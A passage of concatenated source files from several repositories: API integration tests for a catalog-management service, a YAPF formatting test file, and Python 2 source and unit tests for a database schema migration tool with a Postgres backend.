put_offering_instance_response = self.catalog_management_service_authorized.put_offering_instance(
instance_identifier=offering_instance_id,
x_auth_refresh_token=self.refresh_token_authorized,
id=offering_instance_id,
catalog_id=catalog_id,
offering_id=offering_id,
kind_format=kind_vpe,
version='0.0.3',
cluster_id=self.cluster_id,
cluster_region=region_us_south,
cluster_all_namespaces=True,
)
assert put_offering_instance_response.get_status_code() == 200
offering_instance = put_offering_instance_response.get_result()
assert offering_instance is not None
####
# Delete Version
####
@needscredentials
def test_delete_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.delete_version(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_delete_version_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.delete_version(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_delete_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.delete_version(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_delete_version(self):
assert version_locator_id is not None
delete_version_response = self.catalog_management_service_authorized.delete_version(
version_loc_id=version_locator_id,
)
assert delete_version_response.get_status_code() == 200
####
# Delete Operators
####
@needscredentials
def test_delete_operators_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.delete_operators(
x_auth_refresh_token=self.refresh_token_not_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_delete_operators_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.delete_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_delete_operators_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.delete_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_delete_operators(self):
assert version_locator_id is not None
# Error: Error loading version with id: fdeefb18-57aa-4390-a9e0-b66b551db803.
# 2c187aa6-5009-4a2f-8f57-86533d2d3a18: Error[404 Not Found] -
# Version not found: Catalog[fdeefb18-57aa-4390-a9e0-b66b551db803]:Version[2c187aa6-5009-4a2f-8f57-86533d2d3a18]
delete_operators_response = self.catalog_management_service_authorized.delete_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
assert delete_operators_response.get_status_code() == 200
####
# Delete Offering Instance
####
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_delete_offering_instance_returns_403_when_user_is_not_authorized(self):
assert offering_instance_id is not None
try:
self.catalog_management_service_not_authorized.delete_offering_instance(
instance_identifier=offering_instance_id,
x_auth_refresh_token=self.refresh_token_not_authorized,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_delete_offering_instance_returns_404_when_no_such_offering_instance(self):
assert offering_instance_id is not None
try:
self.catalog_management_service_authorized.delete_offering_instance(
instance_identifier='invalid-'+offering_instance_id,
x_auth_refresh_token=self.refresh_token_authorized,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_delete_offering_instance(self):
assert offering_instance_id is not None
delete_offering_instance_response = self.catalog_management_service_authorized.delete_offering_instance(
instance_identifier=offering_instance_id,
x_auth_refresh_token=self.refresh_token_authorized,
)
assert delete_offering_instance_response.get_status_code() == 200
####
# Delete Object Access List
####
@needscredentials
def test_delete_object_access_list_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.delete_object_access_list(
catalog_identifier=catalog_id,
object_identifier=object_id,
accounts=[self.account_id],
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_delete_object_access_list_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.delete_object_access_list(
catalog_identifier='invalid-'+catalog_id,
object_identifier=object_id,
accounts=[self.account_id],
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_delete_object_access_list(self):
assert catalog_id is not None
assert object_id is not None
delete_object_access_list_response = self.catalog_management_service_authorized.delete_object_access_list(
catalog_identifier=catalog_id,
object_identifier=object_id,
accounts=[self.account_id],
)
assert delete_object_access_list_response.get_status_code() == 200
access_list_bulk_response = delete_object_access_list_response.get_result()
assert access_list_bulk_response is not None
####
# Delete Object Access
####
@needscredentials
def test_delete_object_access_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.delete_object_access(
catalog_identifier=catalog_id,
object_identifier=object_id,
account_identifier=self.account_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_delete_object_access_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.delete_object_access(
catalog_identifier='invalid-'+catalog_id,
object_identifier=object_id,
account_identifier=self.account_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_delete_object_access(self):
assert catalog_id is not None
assert object_id is not None
delete_object_access_response = self.catalog_management_service_authorized.delete_object_access(
catalog_identifier=catalog_id,
object_identifier=object_id,
account_identifier=self.account_id,
)
assert delete_object_access_response.get_status_code() == 200
####
# Delete Object
####
@needscredentials
def test_delete_object_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.delete_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_delete_object_returns_200_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
delete_object_response = self.catalog_management_service_authorized.delete_object(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
)
assert delete_object_response.get_status_code() == 200
@needscredentials
def test_delete_object(self):
assert catalog_id is not None
assert object_id is not None
for created_object_id in created_object_ids:
delete_object_response = self.catalog_management_service_authorized.delete_object(
catalog_identifier=catalog_id,
object_identifier=created_object_id,
)
assert delete_object_response.get_status_code() == 200
####
# Delete Offering
####
@needscredentials
def test_delete_offering_returns_200_when_no_such_offering(self):
assert catalog_id is not None
assert offering_id is not None
delete_offering_response = self.catalog_management_service_authorized.delete_offering(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
)
assert delete_offering_response.get_status_code() == 200
@needscredentials
def test_delete_offering_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.delete_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_delete_offering(self):
assert catalog_id is not None
assert offering_id is not None
for i in created_offering_ids:
delete_offering_response = self.catalog_management_service_authorized.delete_offering(
catalog_identifier=catalog_id,
offering_id=i,
)
assert delete_offering_response.get_status_code() == 200
####
# Delete Catalog
####
@needscredentials
def test_delete_catalog_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.delete_catalog(
catalog_identifier='invalid-'+catalog_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_delete_catalog_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.delete_catalog(
catalog_identifier=catalog_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_delete_catalog(self):
assert catalog_id is not None
delete_catalog_response = self.catalog_management_service_authorized.delete_catalog(
catalog_identifier=catalog_id,
)
assert delete_catalog_response.get_status_code() == 200
@classmethod
def teardown_class(cls):
try:
cls.catalog_management_service_authorized.delete_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException:
print("Object is already deleted.")
try:
cls.catalog_management_service_authorized.delete_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
)
except ApiException:
print("Offering is already deleted.")
try:
cls.catalog_management_service_authorized.delete_catalog(
catalog_identifier=catalog_id,
)
except ApiException:
print("Catalog is already deleted.")
``` |
{
"source": "jonahf/Experimental_YAPF",
"score": 3
} |
#### File: work/results/testB.py
```python
x = {
'a': 37,
'b': 42,
'c': 927
}
x = {
'aaaaaaaaaaaaaaa': 37,
'bbbbbbbbbbbbbbb': 42,
'cccccccccccc': 927,
'xxx': 37,
'xxxxxxxxxxxxxx': 42,
'xxxxxx': 927
}
y = 'hello ' 'world'
z = 'hello ' + 'world'
a = 'hello {}'.format('world')
class foo(object):
def f(self):
return 37 * -+2
def g(self, x, y=42):
return y
def f(a):
aaaaaaaaaaaaaaaaa.bbbbbbbbbbbbbbbbb(ccccccccc, ddddddddddddd,
eeeeeeeeeeeee, fffffffffffff)
def conditional_zoo(a):
# thing = x if x else y
thing = x if x else y
# variable = x if x else (y if y else (z if z else z))
variable = x if x else (y
if y else (z
if z else z))
# variable = xxxxxxxxx if xxxxxxxxx else (yyyyyyyyyyyy if yyyyyyyyyyyy else (zzzzzzzzz if zzzzzzzzz else zzzzzzzzz))
variable = xxxxxxxxx if xxxxxxxxx else (yyyyyyyyyyyy
if yyyyyyyyyyyy else
(zzzzzzzzz
if zzzzzzzzz else
zzzzzzzzz))
def island_of_many_commas():
big_ol_list = [
1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8,
9, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7,
8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0
]
# was: complicated_call([a(b).c],[a(b).c],b([c]).a(),f in a(b).c,aaaaaaaaaa)
complicated_call([a(b).c],
[a(b).c],
b([c]).a(), f in a(b).c, aaaaaaaaaa)
train_wreck_call(
1, 2,
function_call(), [4], 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5,
6, 7, {8, 9, 0, 1, 2, 3, 4, 5, 6, 7}, 8, 9, 0, 1, 2, {
3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3
}, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
{0, 1, 2, 3, 4, 5, 6}, 7, 8, 9, 0)
def incomprehensionable():
# a zoo of comprehensions to play with.
d = {n: n**2
for n in range(5)}
d = {n: True
for n in range(5)}
total_length = sum(
len(x)
for x, y in zip(strings, validity)
if y)
californian_name_lengths = sum(
len(name)
for name, zip_code in zip(names, zip_codes)
if zip_code in california_zip_codes)
some_dict = {
k: v
for k, v in [('a', 1), ('b',
2)]
if v % 2 == 0
}
set_of_vowels = {upper(i)
for i in sentence
if i in vowels}
birthdays = (day for day in list_of_days
if day.has_birthday())
birthdays = [day for day in list_of_days
if day.has_birthday()]
zvals = [
zvals[i]
for i, (a, b) in enumerate(pairs(zvals))
if b - a >= threshold
]
not_terribly_pythonic = [
i * 2
for i in [j + 1
for j in range(20)
if (j % 3) == 0]
if i * i > 19
]
for row in [[i * j
for i in range(1, 8)]
for j in range(1, 4)]:
print row
return ("\n".join(
str(i) + ":\t" + "*" * a.count(i)
for i in range(min(a), max(a) + 1)))
class VeryIndented(object):
def list_comprehensions():
if True:
if True:
if True:
if True:
if True:
# now that we're indented a lot, let's see what happens
test_comp = [
x for x in [y
for y in iterable
if cond(y)]
if cond(x)
]
test_comp = [
xxxxxxxxxxx
for xxxxxxxxxxx in [
yyyyyyyyyy for yyyyyyyyyy in iterable
if cond(yyyyyyyyyy)
]
if cond(xxxxxxxxxxx)
]
class AClass(object):
def list_comprehensions():
# was: test_comp = [x for x in [y for y in iterable if cond(y)] if cond(x)]
test_comp = [
x for x in [y
for y in iterable
if cond(y)]
if cond(x)
]
# was: test_comp = [xxx for xxx in [yyy for yyy in iterable if cond(yyy)] if cond(xxx)]
test_comp = [
xxx for xxx in [yyy
for yyy in iterable
if cond(yyy)]
if cond(xxx)
]
# was: test_comp = [xxxxxx for xxxxxx in [yyyyyy for yyyyyy in iterable if cond(yyyyyy)] if cond(xxxxxx)]
test_comp = [
xxxxxx for xxxxxx in
[yyyyyy for yyyyyy in iterable
if cond(yyyyyy)]
if cond(xxxxxx)
]
# was: test_comp = [xxxxxxxxx for xxxxxxxxx in [yyyyyyyy for yyyyyyyy in iterable if cond(yyyyyyyy)] if cond(xxxxxxxxx)]
test_comp = [
xxxxxxxxx
for xxxxxxxxx in
[yyyyyyyy for yyyyyyyy in iterable
if cond(yyyyyyyy)]
if cond(xxxxxxxxx)
]
# was: test_comp = [xxxxxxxxxxx for xxxxxxxxxxx in [yyyyyyyyyy for yyyyyyyyyy in iterable if cond(yyyyyyyyyy)] if cond(xxxxxxxxxxx)]
test_comp = [
xxxxxxxxxxx
for xxxxxxxxxxx in [
yyyyyyyyyy for yyyyyyyyyy in iterable
if cond(yyyyyyyyyy)
]
if cond(xxxxxxxxxxx)
]
``` |
{
"source": "jonahgeorge/schema-tool",
"score": 3
} |
#### File: schematool/command/check.py
```python
from optparse import OptionParser
import os
import re
# local imports
from command import Command
from constants import Constants
from errors import MissingDownAlterError, MissingUpAlterError, MissingRefError
from util import ChainUtil
class CheckCommand(Command):
def init_parser(self):
usage = "schema check [options]"
parser = OptionParser(usage=usage)
parser.add_option('-v', '--verbose',
action='store_true', dest='verbose', default=False,
help='Enable verbose message output')
self.parser = parser
def run(self, inline=False):
"""
Check that the alter chain is valid
"""
# TODO Check that the alter chain is in line with the DB (but not necessarily up to date)
# TODO Make the verbose flag do something based on previous additions
# TODO Add flags to only perform certain checks (as described in the other todos)
if not inline:
# (options, args) = self.parser.parse_args()
self.parser.parse_args()
self.files = ChainUtil.get_alter_files()
# implicitly check validity of chain (integrity check)
chain = ChainUtil.build_chain()
# all other checks
self.check_abandoned_alters(chain)
self.check_missing_pair()
if not inline:
print("Everything looks good!\n")
def check_abandoned_alters(self, chain):
"""
Check for files that do not exist within the current alter chain.
"""
tail = chain
chain_files = []
while tail is not None:
chain_files.append(tail.filename)
tail = tail.backref
up_alter = re.compile('-up.sql')
for alter_file in self.files:
if up_alter.search(alter_file) is not None:
if alter_file not in chain_files:
# @jmurray - how can scenario be encountered?
raise MissingRefError("File not found within build-chain '%s'" % alter_file)
def check_missing_pair(self):
"""
Check for any alters that have an up, but not a down and vice-versa
"""
up_alter = re.compile('-up.sql')
down_alter = re.compile('-down.sql')
for alter_file in self.files:
if up_alter.search(alter_file) is not None:
down_file = up_alter.sub('-down.sql', alter_file)
if not os.path.exists(os.path.join(Constants.ALTER_DIR, down_file)):
raise MissingDownAlterError("no down-file found for '%s', expected '%s'\n" % (
alter_file, down_file))
elif down_alter.search(alter_file) is not None:
up_file = down_alter.sub('-up.sql', alter_file)
if not os.path.exists(os.path.join(Constants.ALTER_DIR, up_file)):
raise MissingUpAlterError("no up-file found for '%s', expected '%s'\n" % (
alter_file, up_file))
```
#### File: schematool/command/gen_sql.py
```python
from optparse import OptionParser
import os
import sys
# local imports
from command import Command
from constants import Constants
from errors import MissingRefError, ReadError
from util import ChainUtil
class GenSqlCommand(Command):
"""
This command is mainly intended for DBAs as a way to use the tool to
generate SQL for various alters that they need to run. This command
will take care of generating statements for the transaction free-time
table as well as ensuring that alters for revisions are inserted into
the revision database's history table.
# TODO@jmurray - is the comment about transaction free-time still relevant?
"""
def init_parser(self):
usage = ("schema gen-sql [options] [ref [ref [...]]]\n"
" If no refs are specified, all refs will be used.")
parser = OptionParser(usage=usage)
parser.add_option('-R', '--no-revision',
action='store_false', dest='gen_revision', default=True,
help='Do not print out the revision-history alter statements')
parser.add_option('-S', '--no-sql',
action='store_false', dest='gen_sql', default=True,
help='Do not generate SQL for the actual alters, just revision inserts')
parser.add_option('-d', '--down',
action='store_true', dest='down_alter', default=False,
help='Generate SQL for down-alter instead of up (default)')
parser.add_option('-q', '--include-rev-query',
action='store_true', dest='include_rev_query', default=False,
help='Include the revision query in the generated SQL')
parser.add_option('-w', '--write-to-file',
action='store_true', dest='write_to_file', default=False,
help=('Do not print to stdout. Instead, write SQL to file in '
'\'static_alter_dir\' directory from config.json. Implies '
'-q/--include-rev-query'))
self.parser = parser
def _setup_static_alter_dir(self):
if self.config.get('static_alter_dir') is None:
return
if not os.path.exists(self.config['static_alter_dir']):
os.makedirs(self.config['static_alter_dir'])
def run(self):
(options, args) = self.parser.parse_args()
# validate static_alter_dir set if flag used
if options.write_to_file:
options.include_rev_query = True
if self.config.get('static_alter_dir') is None:
raise Exception('static_alter_dir must be set in config.json to'
'\nuse -w/--write-to-file flag')
self._setup_static_alter_dir()
refs = args
nodes = ChainUtil.build_chain()
ref_nodes = []
if len(refs) == 0:
# entire chain
refs = self._get_node_ids(nodes)
refs.reverse()
# validate valid refs
for ref in refs:
node = self._find_ref(ref, nodes)
if node is False:
raise MissingRefError("Ref '%s' could not be found" % ref, self.parser.format_help())
else:
ref_nodes.append(node)
# gen SQL for each ref
if options.write_to_file:
# gen SQL for each ref, and save to individual files.
for node in ref_nodes:
sql = self.gen_sql_for_reflist([node], options)
if options.down_alter:
filename = node.down_filename()
else:
filename = node.filename
fobj = open(os.path.join(self.config['static_alter_dir'], filename), 'w')
fobj.write(sql)
fobj.close()
print os.path.join(self.config['static_alter_dir'], filename)
else:
# gen SQL for refs in one call
sql = self.gen_sql_for_reflist(ref_nodes, options)
sys.stdout.write(sql)
def _get_node_ids(self, nodes):
result = []
tail = nodes
while tail is not None:
result.append(tail.id)
tail = tail.backref
return result
def _find_ref(self, ref, nodes):
"""
Given a revision (from the command line), check to see if it exists within
the set of nodes (working backwards). If it does, return the node, else false.
"""
tail = nodes
while tail is not None:
if tail.id == ref:
return tail
tail = tail.backref
return False
def gen_sql_for_reflist(self, ref_nodes, options):
"""
Given a set of refs, generate the SQL for
"""
sql = ''
# If only one alter is being processed, there is no reason to add newlines.
add_newlines = len(ref_nodes) > 1
for node in ref_nodes:
sql += self._gen_sql_for_ref(node, options, add_newlines)
sql = sql.rstrip() + "\n"
return sql
def _gen_sql_for_ref(self, node, options, add_newlines):
"""
Gen sql given a node(ref) and the command-line-options,
"""
sql = ''
if options.gen_sql:
try:
sql_file = None
if options.down_alter:
sql_file = open(os.path.join(Constants.ALTER_DIR, node.down_filename()))
else:
sql_file = open(os.path.join(Constants.ALTER_DIR, node.filename))
sql = sql_file.read()
except OSError, ex:
if 'sql_file' in locals():
sql_file.close()
raise ReadError("could not file '%s'.\n\t=>%s\n" % (os.path.join(Constants.ALTER_DIR, node.filename), ex))
if options.include_rev_query or options.gen_revision:
if options.down_alter:
rev_query = self.db.get_remove_commit_query(node.id)
else:
rev_query = self.db.get_append_commit_query(node.id)
if options.include_rev_query:
sql += '\n\n-- start rev query\n%s;\n-- end rev query\n' % rev_query.encode('utf-8')
else:
sql += (rev_query + ';')
if add_newlines:
sql += "\n\n"
return sql
```
#### File: schematool/db/db.py
```python
import subprocess
import sys
# local imports
from errors import AppliedAlterError
# TODO: Move connection management to schema.py. Instantiate a connection
# before each run() method and close it at the end, using the DB.conn() method.
class Db(object):
"""
Do not instantiate directly.
Contains all the methods related to initialization of the environment that the
script will be running in.
"""
@classmethod
def new(cls, config):
cls.config = config
cls.conn_initialized = False
return cls
@classmethod
def init(cls, force=False):
"""
Make sure that the table to track revisions is there.
"""
if force:
sys.stdout.write('Removing existing history')
cls.drop_revision()
sys.stdout.write('Creating revision database\n')
cls.create_revision()
sys.stdout.write('Creating history table\n')
cls.create_history()
sys.stdout.write('DB Initialized\n')
@classmethod
def run_up(cls, alter, force=False, verbose=False):
"""
Run the up-alter against the DB
"""
sys.stdout.write('Running alter: %s\n' % alter.filename)
filename = alter.abs_filename()
cls._run_file(filename=filename, exit_on_error=not force, verbose=verbose)
cls.append_commit(ref=alter.id)
@classmethod
def run_down(cls, alter, force=False, verbose=False):
"""
Run the down-alter against the DB
"""
sys.stdout.write('Running alter: %s\n' % alter.down_filename())
filename = alter.abs_filename(direction='down')
cls._run_file(filename=filename, exit_on_error=not force, verbose=verbose)
cls.remove_commit(ref=alter.id)
@classmethod
def _run_file(cls, filename, exit_on_error=True, verbose=False):
# Used for testing to simulate an error in the running of an alter file
if getattr(cls, 'auto_throw_error', False) and 'error' in filename:
command, my_env, stdin_stream = cls.run_file_cmd_with_error(filename)
else:
command, my_env, stdin_stream = cls.run_file_cmd(filename)
if stdin_stream:
proc = subprocess.Popen(command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=my_env)
script = open(filename)
out, err = proc.communicate(script.read())
else:
proc = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=my_env)
out, err = proc.communicate()
if err:
sys.stderr.write("\n----------------------\n")
sys.stderr.write(out.rstrip())
sys.stderr.write(err.rstrip())
sys.stderr.write("\n----------------------\n")
if not proc.returncode == 0:
sys.stderr.write('Error')
if verbose:
sys.stderr.write("\n----------------------\n")
sys.stderr.write(out.rstrip())
sys.stderr.write(err.rstrip())
sys.stderr.write("\n----------------------\n")
sys.stderr.write("\n")
if exit_on_error:
raise AppliedAlterError('%s execution unsuccessful' % filename)
@classmethod
def get_applied_alters(cls):
results = cls.execute('SELECT alter_hash FROM %s' % cls.full_table_name)
alters_hashes = [result[0] for result in results]
return alters_hashes
```
#### File: schematool/db/_pg.py
```python
import os
try:
import psycopg2
import psycopg2.extras
except ImportError:
pass
# local imports
from db import Db
from errors import DbError
class PostgresDb(Db):
DEFAULT_PORT=5432
@classmethod
def new(cls, config):
super(PostgresDb, cls).new(config)
if 'revision_schema_name' in cls.config:
cls.history_table_name = cls.config['history_table_name']
cls.full_table_name = '"%s"."%s"' % (cls.config['revision_schema_name'],
cls.config['history_table_name'])
else:
raise DbError('No schema found in config file. Please add one with the key: '
'revision_schema_name')
return cls
@classmethod
def init_conn(cls):
try:
psycopg2
except NameError:
raise DbError('Postgres module not found/loaded. Please make sure psycopg2 is installed\n')
cls.conn = cls.conn()
cls.cursor = cls.conn.cursor()
cls.conn_initialized = True
return cls
@classmethod
def execute(cls, query, data=None):
if not cls.conn_initialized:
cls.init_conn()
try:
cursor = cls.cursor
cursor.execute('SET search_path TO %s' % cls.config['schema_name'])
if data:
cursor.execute(query, data)
else:
cursor.execute(query)
results = []
# If rowcount == 0, just return None.
#
# Note from psycopg2 docs:
#
# The rowcount attribute specifies the number of rows that the
# last execute*() produced (for DQL statements like SELECT) or
# affected (for DML statements like UPDATE or INSERT).
#
# http://initd.org/psycopg/docs/cursor.html
#
# Thus, it is possible that fetchone/fetchall will fail despite
# rowcount being > 0. That error is caught below and None is
# returned.
if cursor.rowcount > 0:
try:
results = cursor.fetchall()
except psycopg2.ProgrammingError, e:
if str(e) != 'no results to fetch':
raise psycopg2.ProgrammingError(e.message)
cls.conn.commit()
return results
except Exception, e:
raise DbError('Psycopg2 execution error: %s\n. Query: %s - Data: %s\n.'
% (e.message, query, str(data)))
@classmethod
def drop_revision(cls):
return cls.execute('DROP SCHEMA IF EXISTS %s' % cls.config['revision_schema_name'])
@classmethod
def create_revision(cls):
# Executing 'CREATE SCHEMA IF NOT EXISTS' fails if the user does not
# have schema creation privileges, even if the schema already exists.
# The correct action is to break this method into two parts: checking
# if the schema exists, and then creating it only if it does not.
#
# The 'IF NOT EXISTS' flag is still used in case the database is
# created after the existence check but before the CREATE statement.
check = "SELECT EXISTS(SELECT 1 FROM pg_namespace WHERE nspname = %s)"
result = cls.execute(check, [cls.config['revision_schema_name']])
if result[0] == (True,):
return
else:
return cls.execute('CREATE SCHEMA IF NOT EXISTS %s' % cls.config['revision_schema_name'])
@classmethod
def get_commit_history(cls):
return cls.execute('SELECT id, alter_hash, ran_on FROM %s' % cls.full_table_name)
@classmethod
def append_commit(cls, ref):
return cls.execute('INSERT INTO %s (alter_hash) VALUES (%s)' % (cls.full_table_name, '%s'),
(ref,))
@classmethod
def get_append_commit_query(cls, ref):
return "INSERT INTO %s (alter_hash, ran_on) VALUES ('%s', NOW())" % (cls.full_table_name, ref)
@classmethod
def remove_commit(cls, ref):
return cls.execute('DELETE FROM %s WHERE alter_hash = %s' % (cls.full_table_name, '%s'),
(ref,))
@classmethod
def get_remove_commit_query(cls, ref):
return "DELETE FROM %s WHERE alter_hash = '%s'" % (cls.full_table_name, ref)
@classmethod
def create_history(cls):
return cls.execute("""CREATE TABLE IF NOT EXISTS %s (
id serial NOT NULL,
alter_hash VARCHAR(100) NOT NULL,
ran_on timestamp NOT NULL DEFAULT current_timestamp,
CONSTRAINT pk_%s__id PRIMARY KEY (id),
CONSTRAINT uq_%s__alter_hash UNIQUE (alter_hash)
)""" % (cls.full_table_name, cls.history_table_name, cls.history_table_name))
@classmethod
def conn(cls):
"""
return the postgres connection handle to the configured server
"""
config = cls.config
try:
# conn_string here
conn_string_parts = []
conn_string_params = []
for key, value in config.iteritems():
# Build connection string based on what is defined in the config
if value:
if key == 'host':
conn_string_parts.append('host=%s')
conn_string_params.append(value)
elif key == 'username':
conn_string_parts.append('user=%s')
conn_string_params.append(value)
elif key == 'password':
conn_string_parts.append('password=%s')
conn_string_params.append(value)
elif key == 'revision_db_name':
conn_string_parts.append('dbname=%s')
conn_string_params.append(value)
elif key == 'port':
conn_string_parts.append('port=%s')
conn_string_params.append(value)
conn_string = ' '.join(conn_string_parts) % tuple(conn_string_params)
conn = psycopg2.connect(conn_string)
except Exception, e:
raise DbError("Cannot connect to Postgres Db: %s\n"
"Ensure that the server is running and you can connect normally"
% e.message)
return conn
@classmethod
def run_file_cmd(cls, filename):
"""
return a 3-tuple of strings containing:
the command to run (list)
environment variables to be passed to command (dictionary or None)
data to be piped into stdin (file-like object or None)
"""
port_number = str(cls.config.get('port', PostgresDb.DEFAULT_PORT))
cmd = ['psql',
'-h', cls.config['host'],
'-U', cls.config['username'],
'-p', port_number,
'-v', 'verbose',
'-v', 'ON_ERROR_STOP=1',
'-v', 'schema=%s' % cls.config['schema_name'],
cls.config['db_name']]
my_env = None
if 'password' in cls.config:
my_env = os.environ.copy()
my_env['PGPASSWORD'] = cls.config['password']
return cmd, my_env, open(filename)
```
#### File: test/commands/down.py
```python
import os
import sys
import unittest
# src imports
import_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../schematool')
sys.path.append(import_path)
from command import CommandContext, DownCommand
from db import MemoryDb
from errors import MissingRefError
# test util imports
import_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../util')
sys.path.append(import_path)
from alter_util import AlterUtil
from env_util import EnvironmentUtil
from test_util import make_argv
class DownTest(unittest.TestCase):
def setUp(self):
EnvironmentUtil.setup_fresh_test_env()
self.context = CommandContext.via({
'type': 'memory-db'})
self.downCommand = DownCommand(self.context)
def tearDown(self):
EnvironmentUtil.teardown_fresh_test_env()
def test_all_undoes_all_current_alters_when_none(self):
self.assertEqual(len(MemoryDb.data), 0)
sys.argv = make_argv(['all'])
self.downCommand.run()
self.assertEqual(len(MemoryDb.data), 0)
def test_all_undoes_all_current_alters_when_alters(self):
AlterUtil.create_alters([1])
AlterUtil.run_alters()
self.assertEqual(len(MemoryDb.data), 1)
sys.argv = make_argv(['all'])
self.downCommand.run()
self.assertEqual(len(MemoryDb.data), 0)
def test_ref_undoes_all_alters_including_ref(self):
AlterUtil.create_alters([1,2,3])
ids = AlterUtil.run_alters()
self.assertEqual(len(MemoryDb.data), 3)
sys.argv = make_argv([str(ids[1])])
self.downCommand.run()
self.assertEqual(len(MemoryDb.data), 1)
def test_ref_undoes_nothing_when_ref_doesnt_exist(self):
AlterUtil.create_alters([1, 2, 3, 4])
AlterUtil.run_alters()
self.assertEqual(len(MemoryDb.data), 4)
sys.argv = make_argv([str(10)])
try:
self.downCommand.run()
except MissingRefError:
pass
self.assertEqual(len(MemoryDb.data), 4)
def test_base_undoes_all_but_last_when_more_than_one(self):
AlterUtil.create_alters([1, 2])
AlterUtil.run_alters()
self.assertEqual(len(MemoryDb.data), 2)
sys.argv = make_argv(['base'])
self.downCommand.run()
self.assertEqual(len(MemoryDb.data), 1)
def test_base_undoes_none_when_no_alters(self):
self.assertEqual(len(MemoryDb.data), 0)
sys.argv = make_argv(['base'])
self.downCommand.run()
self.assertEqual(len(MemoryDb.data), 0)
def test_base_undoes_none_when_one_alter(self):
AlterUtil.create_alters([1])
AlterUtil.run_alters()
self.assertEqual(len(MemoryDb.data), 1)
sys.argv = make_argv(['base'])
self.downCommand.run()
self.assertEqual(len(MemoryDb.data), 1)
def test_n_option_runs_down_given_number_of_alters(self):
AlterUtil.create_alters([1, 2, 3, 4])
AlterUtil.run_alters()
self.assertEqual(len(MemoryDb.data), 4)
sys.argv = make_argv(['-n2'])
self.downCommand.run()
self.assertEqual(len(MemoryDb.data), 2)
if __name__ == '__main__':
unittest.main()
```
#### File: test/commands/new.py
```python
import os
import sys
import unittest
from time import sleep
# schematool imports
import_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../schematool')
sys.path.append(import_path)
from command import CommandContext, NewCommand
from util import ChainUtil
# test util imports
import_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../util')
sys.path.append(import_path)
from env_util import EnvironmentUtil
from test_util import make_argv
class NewTest(unittest.TestCase):
def setUp(self):
EnvironmentUtil.setup_fresh_test_env()
self.context = CommandContext.via({
'type': 'memory-db'})
self.newCommand = NewCommand(self.context)
def tearDown(self):
